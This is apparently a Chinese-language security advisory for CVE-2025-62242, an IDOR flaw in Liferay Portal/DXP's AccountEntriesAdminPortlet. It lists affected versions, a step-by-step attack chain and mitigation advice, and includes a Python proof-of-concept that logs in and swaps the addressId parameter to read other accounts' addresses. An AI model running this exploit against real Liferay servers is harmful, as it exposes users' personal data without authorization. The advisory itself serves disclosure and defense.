CVE-2025-62242：Liferay Portal账户地址IDOR漏洞

漏洞信息

漏洞编号

CVE-2025-62242

漏洞类型

IDOR（不安全的直接对象引用）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Liferay Portal / Liferay DXP

漏洞概述

CVE-2025-62242是Liferay Portal和Liferay DXP中存在的一个不安全的直接对象引用（IDOR）漏洞。该漏洞位于账户管理模块的AccountEntriesAdminPortlet中，具体涉及_com_liferay_account_admin_web_internal_portlet_AccountEntriesAdminPortlet_addressId参数。由于服务端未对该参数进行充分的权限校验，远程经过身份验证的低权限用户可以通过修改addressId参数的值，越权访问其他账户的地址信息。

该漏洞影响多个Liferay产品线，包括Liferay Portal 7.4.3.4至7.4.3.111版本，以及Liferay DXP的2023.Q4.0至2023.Q4.5、2023.Q3.1至2023.Q3.8和7.4 GA至update 92等多个版本。漏洞的CVSS 3.1评分为4.3分，属于中危级别，攻击向量为网络攻击，需要低权限认证，但无需用户交互，主要影响是机密性的低程度泄露。

该漏洞由[email protected]报告，属于Liferay官方安全团队发现的内部安全问题。IDOR漏洞是Web应用中常见的安全缺陷，通常由于开发人员在处理用户请求时未对资源标识符进行严格的访问控制检查所致。在多租户或共享环境中，此类漏洞可能导致用户间的数据隔离失效，进而引发隐私泄露风险。虽然该漏洞本身仅涉及地址信息的读取，但由于地址信息可能包含个人敏感数据（如收货地址、联系方式等），因此仍需引起足够重视。

技术细节

该IDOR漏洞的核心问题在于Liferay Portal的账户管理Portlet（AccountEntriesAdminPortlet）在处理地址查询请求时，未对传入的addressId参数执行充分的访问控制验证。

正常情况下，当用户A请求查看自己账户下的地址信息时，系统会根据当前会话的用户身份查询该用户有权访问的地址。然而，由于服务端仅依赖客户端传入的addressId参数来定位资源，而未验证该地址是否属于当前请求用户，攻击者可以通过以下方式利用该漏洞：

1. 攻击者首先需要拥有一个有效的Liferay Portal账户（低权限即可）。
2. 攻击者通过正常方式获取自己账户下的某个合法addressId值。
3. 攻击者将请求中的addressId参数替换为其他用户的地址ID（可通过枚举或猜测获得）。
4. 服务端未进行权限校验，直接根据传入的addressId返回对应的地址数据，导致信息泄露。

漏洞利用的关键参数为_com_liferay_account_admin_web_internal_portlet_AccountEntriesAdminPortlet_addressId，这是Liferay Portlet框架中用于传递资源标识符的标准参数。修复方案需要在服务端增加对addressId与当前用户权限的关联校验，确保用户只能访问自己有权查看的地址资源。

攻击链分析

STEP 1

步骤1：获取有效凭据

攻击者首先注册或获取一个Liferay Portal的低权限账户，获得有效的会话凭证。

STEP 2

步骤2：正常访问地址功能

攻击者通过正常途径访问账户地址管理功能，获取自己账户下的合法addressId参数值。

STEP 3

步骤3：枚举或猜测目标addressId

攻击者通过枚举、暴力猜测或其他途径获取其他用户的addressId值。

STEP 4

步骤4：构造恶意请求

将请求中的_com_liferay_account_admin_web_internal_portlet_AccountEntriesAdminPortlet_addressId参数替换为目标用户的地址ID。

STEP 5

步骤5：越权读取地址信息

服务端未验证地址归属，直接返回目标用户的地址数据，造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62242 PoC - Liferay Portal IDOR in AccountEntriesAdminPortlet
# Vulnerability: Insecure Direct Object Reference in addressId parameter
# Affected: Liferay Portal 7.4.3.4-7.4.3.111, Liferay DXP 2023.Q3/2023.Q4

import requests

# Configuration
TARGET_URL = "https://target-liferay-instance.com"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Step 1: Authenticate to obtain session cookie
session = requests.Session()
login_url = f"{TARGET_URL}/c/portal/login"
login_params = {
    "p_p_id": "com_liferay_login_web_portlet_LoginPortlet",
    "p_p_lifecycle": "0",
    "_com_liferay_login_web_portlet_LoginPortlet_login": USERNAME,
    "_com_liferay_login_web_portlet_LoginPortlet_password": PASSWORD,
}
session.post(login_url, data=login_params)

# Step 2: Exploit IDOR by manipulating the addressId parameter
# The vulnerable parameter allows viewing addresses from other accounts
vulnerable_url = f"{TARGET_URL}/group/control_panel/manage"
exploit_params = {
    "p_p_id": "com_liferay_account_admin_web_internal_portlet_AccountEntriesAdminPortlet",
    "p_p_lifecycle": "0",
    "_com_liferay_account_admin_web_internal_portlet_AccountEntriesAdminPortlet_addressId": "<VICTIM_ADDRESS_ID>",  # Replace with target address ID
    "_com_liferay_account_admin_web_internal_portlet_AccountEntriesAdminPortlet_mvcPath": "/account_entries_admin/view_address.jsp",
}

response = session.get(vulnerable_url, params=exploit_params)

# Step 3: Check if address data from another account is leaked
if response.status_code == 200 and "address" in response.text.lower():
    print("[+] IDOR vulnerability confirmed!")
    print("[+] Leaked address data:")
    print(response.text)
else:
    print("[-] Exploit failed or patched.")

影响范围

Liferay Portal >= 7.4.3.4, < 7.4.3.112

Liferay DXP 2023.Q4.0 <= version <= 2023.Q4.5

Liferay DXP 2023.Q3.1 <= version <= 2023.Q3.8

Liferay DXP >= 7.4 GA, <= 7.4 update 92

防御指南

临时缓解措施

在官方补丁发布之前，建议管理员限制普通用户对账户管理Portlet的访问权限，可以通过Liferay的角色权限配置功能，降低AccountEntriesAdminPortlet的访问权限，仅授予必要的管理员角色。同时，建议监控异常的地址访问请求日志，及时发现可疑的越权访问行为。对于多租户环境，建议在网络层面实施租户隔离策略。